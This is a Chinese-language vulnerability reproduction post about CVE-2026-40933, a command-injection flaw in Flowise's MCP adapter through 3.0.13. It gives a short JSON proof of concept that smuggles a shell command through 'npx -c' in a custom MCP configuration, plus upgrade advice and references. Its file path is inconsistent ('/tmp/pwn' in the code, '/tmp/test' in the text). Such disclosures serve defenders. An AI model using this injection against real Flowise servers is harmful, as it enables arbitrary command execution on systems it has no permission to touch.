文章总结： Flowise3.0.13及更早版本存在MCP适配器命令注入漏洞（CVE-2026-40933），已认证攻击者可通过npx-c命令注入任意操作系统指令实现远程代码执行。漏洞原理为stdio命令清理不完善，攻击者可在底层服务器执行任意命令。建议立即升级至3.1.0或更高版本修复该漏洞。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,解决方案,应用安全,供应链安全

【漏洞复现】Flowise 中通过 MCP 适配器实现远程代码执行漏洞（CVE-2026-40933）

信通云服

2026年4月22日 16:38 新加坡

在小说阅读器读本章

去阅读

【漏洞描述】

组件介绍

Flowise是一个开源的可视化低代码平台，用于快速构建基于大语言模型（LLM）的AI应用。

漏洞简介

在 Flowise 3.0.13 及更早版本中，MCP 适配器对 stdio 命令的清理存在缺陷，允许已通过身份验证的攻击者在自定义 MCP 配置中，通过 npx -c 等看似合法的命令注入任意操作系统指令，从而实现远程代码执行，攻击者可在底层服务器上执行任意命令。该漏洞已在 3.1.0 版本中修复。

【漏洞复现】

进入Chatflows页面创建一个新的自定义MCP，并添加“npx -c”命令。

poc

{    "command": "npx",    "args": [        "-c",        "touch /tmp/pwn"    ]}

成功执行touch /tmp/test命令创建test文件

【修复建议】

升级至 3.1.0 或更高版本

【参考链接】

https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp

https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：信通云服 《【漏洞复现】Flowise 中通过 MCP 适配器实现远程代码执行漏洞（CVE-2026-40933）》